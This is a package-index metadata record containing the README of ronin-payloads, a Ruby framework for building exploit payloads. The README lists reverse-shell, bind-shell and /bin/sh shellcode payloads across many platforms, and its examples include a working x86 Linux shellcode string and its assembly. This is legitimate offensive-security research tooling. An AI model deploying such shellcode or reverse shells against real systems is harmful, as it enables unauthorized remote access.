{"id":17383763,"url":"https://github.com/ronin-rb/ronin-payloads","last_synced_at":"2025-10-31T09:30:58.905Z","repository":{"id":53676916,"uuid":"436357466","full_name":"ronin-rb/ronin-payloads","owner":"ronin-rb","description":"A Ruby micro-framework for writing and running exploit payloads","archived":false,"fork":false,"pushed_at":"2024-08-19T23:22:30.000Z","size":1507,"stargazers_count":21,"open_issues_count":32,"forks_count":7,"subscribers_count":3,"default_branch":"main","last_synced_at":"2024-10-29T14:22:28.047Z","etag":null,"topics":["ctf-tools","execve","exploit-development","exploit-framework","hacking-tools","hacktoberfest","infosec","payloads","reverse-shell","ruby","security","security-tools","shellcode"],"latest_commit_sha":null,"homepage":"https://ronin-rb.dev","language":"Ruby","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"lgpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ronin-rb.png","metadata":{"files":{"readme":"README.md","changelog":"ChangeLog.md","contributing":null,"funding":null,"license":"COPYING.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"open_collective":"ronin-rb","patreon":"roninrb"}},"created_at":"2021-12-08T18:48:56.000Z","updated_at":"2024-10-23T03:29:09.000Z","dependencies_parsed_at":"2024-01-13T12:32:02.797Z","dependency_job_id":"e2ae7317-7660-4ff8-a22e-eaea27d4cb45","html_url":"https://github.com/ronin-rb/ronin-payloads","commit_stats":{"total_commits":1128,"total_committers":3,"mean_commits":376.0,"dds":"0.0026595744680850686","last_synced_commit":"f68a794d7e5076e80b84c98d447ab9fb450664ce"},"previous_names":[],"tags_count":23,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ronin-rb%2Fronin-payloads","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ronin-rb%2Fronin-payloads/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ronin-rb%2Fronin-payloads/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ronin-rb%2Fronin-payloads/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ronin-rb","download_url":"https://codeload.github.com/ronin-rb/ronin-payloads/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239137147,"owners_count":19587949,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ctf-tools","execve","exploit-development","exploit-framework","hacking-tools","hacktoberfest","infosec","payloads","reverse-shell","ruby","security","security-tools","shellcode"],"created_at":"2024-10-16T07:43:42.306Z","updated_at":"2025-10-31T09:30:53.354Z","avatar_url":"https://github.com/ronin-rb.png","language":"Ruby","funding_links":["https://opencollective.com/ronin-rb","https://patreon.com/roninrb"],"categories":[],"sub_categories":[],"readme":"# ronin-payloads\n\n[![CI](https://github.com/ronin-rb/ronin-payloads/actions/workflows/ruby.yml/badge.svg)](https://github.com/ronin-rb/ronin-payloads/actions/workflows/ruby.yml)\n[![Code Climate](https://codeclimate.com/github/ronin-rb/ronin-payloads.svg)](https://codeclimate.com/github/ronin-rb/ronin-payloads)\n[![Gem Version](https://badge.fury.io/rb/ronin-payloads.svg)](https://badge.fury.io/rb/ronin-payloads)\n\n* [Website](https://ronin-rb.dev/)\n* [Source](https://github.com/ronin-rb/ronin-payloads)\n* [Issues](https://github.com/ronin-rb/ronin-payloads/issues)\n* [Documentation](https://ronin-rb.dev/docs/ronin-payloads/frames)\n* [Discord](https://discord.gg/6WAb3PsVX9) |\n [Mastodon](https://infosec.exchange/@ronin_rb)\n\n## Description\n\nronin-payloads is a Ruby micro-framework for writing and running exploit\npayloads. ronin-payloads allows one to write payloads as plain old Ruby classes.\nronin-payloads can be distributed as Ruby files or in git repositories that can\nbe installed with [ronin-repos].\n\n**tl;dr** It's like `msfvenom` but simpler and more modular.\n\nronin-payloads is part of the [ronin-rb] project, a [Ruby] toolkit for security\nresearch and development.\n\n## Features\n\n* Provides a succinct syntax and API for writing payloads in as few lines as\n possible.\n* Supports defining Payloads as plain old Ruby classes.\n* Provides base classes for a variety of languages and payload types\n (ASM, Shellcode, C, Go, Rust, Java, Groovy, JSP, PHP, Python, Ruby, NodeJS,\n Nashorn, Shell, PowerShell, SQL, XML, HTML, URL).\n* Supports cross compiling C payloads to different architectures and OSes.\n* Provides built-in common payloads:\n * Command-line reverse shells:\n * Awk\n * Bash\n * Lua\n * NodeJS\n * OpenSSL\n * Perl\n * PHP\n * PowerShell\n * Python\n * Ruby\n * Zsh\n * Java\n * Reverse shell\n * JavaScript\n * Node.js\n * Reverse shell\n * Nashorn\n * Reverse shell\n * Groovy\n * Reverse shell\n * PHP\n * Command exec.\n * Shellcode:\n * `execve(/bin/sh)`:\n * Linux (ARM, MIPS, PPC, x86, x86-64)\n * FreeBSD (x86, x86-64)\n * macOS (x86-64)\n * NetBSD (x86)\n * OpenBSD (x86)\n * bind shell:\n * Linux (ARM, MIPS, x86, x86-64)\n * FreeBSD (x86)\n * OpenBSD (x86)\n * reverse shell:\n * Linux (ARM, MIPS, PPC, x86, x86-64)\n * macOS (x86-64)\n * FreeBSD (x86)\n * NetBSD (x86)\n * C payloads:\n * reverse shell:\n * Windows (x86-64 and i686)\n * UNIX (Linux, FreeBSD, OpenBSD, NetBSD, macOS)\n* Supports adding additional encoders to payloads for further obfuscation.\n* Integrates with the [Ronin Post-Exploitation][ronin-post_ex] library.\n* Provides a simple CLI for building, encoding, launching, and generating new\n payloads.\n* Has 86% documentation coverage.\n* Has 99% test coverage.\n\n## Anti-Features\n\n* No magic: exploits are defined as classes in files.\n* No global state that could cause memory leaks.\n* Not a big bulky framework, just a library.\n* Not a central repository. Additional [ronin-payloads] can be hosted in other\n git repositories. This prevents censorship of offensive security tools.\n\n## Synopsis\n\n```\nUsage: ronin-payloads [options] [COMMAND [ARGS...]]\n\nOptions:\n -h, --help Print help information\n\nArguments:\n [COMMAND] The command name to run\n [ARGS ...] Additional arguments for the command\n\nCommands:\n build\n completion\n encode\n encoder\n encoders\n help\n irb\n launch\n list, ls\n new\n show, info\n```\n\nList available payloads:\n\n```shell\n$ ronin-payloads list\n bin/unix/reverse_shell\n bin/windows/reverse_shell\n cmd/awk/reverse_shell\n cmd/bash/reverse_shell\n cmd/lua/reverse_shell\n cmd/netcat/bind_shell\n cmd/node/reverse_shell\n cmd/openssl/reverse_shell\n cmd/perl/reverse_shell\n cmd/php/reverse_shell\n cmd/ping\n cmd/powershell/reverse_shell\n cmd/python/reverse_shell\n cmd/ruby/reverse_shell\n cmd/sleep\n cmd/touch\n cmd/windows/download\n cmd/zsh/reverse_shell\n groovy/reverse_shell\n java/reverse_shell\n js/nashorn/reverse_shell\n js/node/reverse_shell\n php/cmd_exec\n php/download_exec\n shellcode/freebsd/x86/bind_shell\n shellcode/freebsd/x86/exec_shell\n shellcode/freebsd/x86/reverse_shell\n shellcode/freebsd/x86_64/exec_shell\n shellcode/linux/arm/bind_shell\n shellcode/linux/arm/exec_shell\n shellcode/linux/arm/reverse_shell\n shellcode/linux/mips/bind_shell\n shellcode/linux/mips/exec_shell\n shellcode/linux/mips/reverse_shell\n shellcode/linux/ppc/exec_shell\n shellcode/linux/ppc/reverse_shell\n shellcode/linux/x86/bind_shell\n shellcode/linux/x86/exec_shell\n shellcode/linux/x86/reverse_shell\n shellcode/linux/x86_64/bind_shell\n shellcode/linux/x86_64/exec_shell\n shellcode/linux/x86_64/reverse_shell\n shellcode/macos/x86_64/exec_shell\n shellcode/macos/x86_64/reverse_shell\n shellcode/netbsd/x86/exec_shell\n shellcode/netbsd/x86/reverse_shell\n shellcode/openbsd/x86/bind_shell\n shellcode/openbsd/x86/exec_shell\n shellcode/windows/x86_64/cmd\n test/cmd\n test/open_redirect\n test/url\n test/xss\n```\n\nInstall a 3rd-party repository of payloads:\n\n```shell\n$ ronin-repos install https://github.com/user/payloads.git\n```\n\nPrint additional information about a specific payload:\n\n```shell\n$ ronin-payloads show NAME\n```\n\nList available payload encoders:\n\n```shell\n$ ronin-payloads encoders\n```\n\nPrint additional information about a specific encoder:\n\n```shell\n$ ronin-payloads encoder NAME\n```\n\nBuild and output a payload:\n\n```shell\n$ ronin-payloads build NAME\n```\n\nLoad a payload from a file, then build and output it:\n\n```shell\n$ ronin-payloads build -f FILE NAME\n```\n\nGenerate a boilerplate payload file, with some custom information:\n\n```shell\n$ ronin-payloads new example_payload.rb \\\n --name Example --arch i686 --os Linux \\\n --authors Postmodern --description \"This is an example.\"\n```\n\nGenerate a ronin repository of your own payloads (or exploits):\n\n```shell\n$ ronin-repos new my-repo\n$ cd my-repo/\n$ mkdir payloads\n$ ronin-payloads new payloads/my_payload.rb \\\n --name MyPayload --arch i686 --os Linux \\\n --authors You --description \"This is my payload.\"\n$ vim payloads/my_payload.rb\n$ git add payloads/my_payload.rb\n$ git commit\n$ git push\n```\n\n## Examples\n\nDefine a `/bin/sh` shellcode payload:\n\n```ruby\n# encoding: ASCII-8BIT\nrequire 'ronin/payloads/shellcode_payload'\n\nmodule Ronin\n module Payloads\n class LinuxX86BinSh \u003c ShellcodePayload\n\n register 'shellcode/linux/x86/bin_sh'\n\n summary 'x86 Linux /bin/sh shellcode'\n description \u003c\u003c~EOS\n Shellcode that spawns a local /bin/sh shell\n EOS\n\n arch :x86\n os :linux\n\n def build\n @payload = \"1\\xc0Ph//shh/bin\\x89\\xdcPS\\x89\\xcc1\\xd2\\xcd\\x0b\"\n end\n end\n end\nend\n```\n\nDefine a `/bin/sh` shellcode payload in pure-Ruby:\n\n```ruby\nrequire 'ronin/payloads/shellcode_payload'\n\nmodule Ronin\n module Payloads\n module Shellcode\n module Linux\n module X86\n class BinSh \u003c ShellcodePayload\n\n register 'shellcode/linux/x86/bin_sh'\n description \u003c\u003c~DESC\n Shellcode that spawns a local /bin/sh shell\n DESC\n\n arch :x86\n os :linux\n\n def build\n shellcode do\n xor eax, eax\n push eax\n push 0x68732f2f\n push 0x6e69622f\n mov esp, ebx\n push eax\n push ebx\n mov esp, ecx\n xor edx, edx\n int 0xb\n end\n end\n\n end\n end\n end\n end\n end\nend\n```\n\nDefine a payload encoder class:\n\n```ruby\nrequire 'ronin/encoders/encoder'\n\nmodule Ronin\n module Payloads\n module Encoders\n module Text\n class Base64 \u003c Ronin::Encoders::Encoder\n\n register 'text/base64'\n\n description \u003c\u003c~DESC\n Example base64 payload encoder\n DESC\n\n arch :x86\n os :linux\n\n def encode(data)\n data.to_s.base64_encode\n end\n\n end\n end\n end\n end\nend\n```\n\n## Requirements\n\n* [Ruby] \u003e= 3.0.0\n* [ronin-support] ~\u003e 1.0\n* [ronin-code-asm] ~\u003e 1.0\n* [ronin-post_ex] ~\u003e 0.1\n* [ronin-core] ~\u003e 0.2\n* [ronin-repos] ~\u003e 0.1\n\n## Install\n\n```shell\n$ gem install ronin-payloads\n```\n\n### Gemfile\n\n```ruby\ngem 'ronin-payloads', '~\u003e 0.1'\n```\n\n### gemspec\n\n```ruby\ngem.add_dependency 'ronin-payloads', '~\u003e 0.1'\n```\n\n## Development\n\n1. [Fork It!](https://github.com/ronin-rb/ronin-payloads/fork)\n2. Clone It!\n3. `cd ronin-payloads/`\n4. `./scripts/setup`\n5. `git checkout -b my_feature`\n6. Code It!\n7. `bundle exec rake spec`\n8. `git push origin my_feature`\n\n## Disclaimer\n\nronin-payloads only contains basic or generic exploit payloads that can be\neasily found online or in other Open Source security tools. ronin-payloads\n**does not** contain by default any weaponized payloads. These payloads are\nthemselves not harmful without an exploit to deliver them. Therefor,\nronin-payloads **must not** and **should not** be considered to be\nmalicious software (malware) or malicious in nature.\n\n## License\n\nCopyright (c) 2007-2025 Hal Brodigan (postmodern.mod3 at gmail.com)\n\nronin-payloads is free software: you can redistribute it and/or modify\nit under the terms of the GNU Lesser General Public License as published\nby the Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nronin-payloads is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Lesser General Public License for more details.\n\nYou should have received a copy of the GNU Lesser General Public License\nalong with ronin-payloads. If not, see \u003chttps://www.gnu.org/licenses/\u003e.\n\n[Ruby]: https://www.ruby-lang.org\n[ronin-rb]: https://ronin-rb.dev\n\n[ronin-support]: https://github.com/ronin-rb/ronin-support#readme\n[ronin-code-asm]: https://github.com/ronin-rb/ronin-code-asm#readme\n[ronin-core]: https://github.com/ronin-rb/ronin-core#readme\n[ronin-repos]: https://github.com/ronin-rb/ronin-repos#readme\n[ronin-post_ex]: https://github.com/ronin-rb/ronin-post_ex#readme\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fronin-rb%2Fronin-payloads","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fronin-rb%2Fronin-payloads","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fronin-rb%2Fronin-payloads/lists"}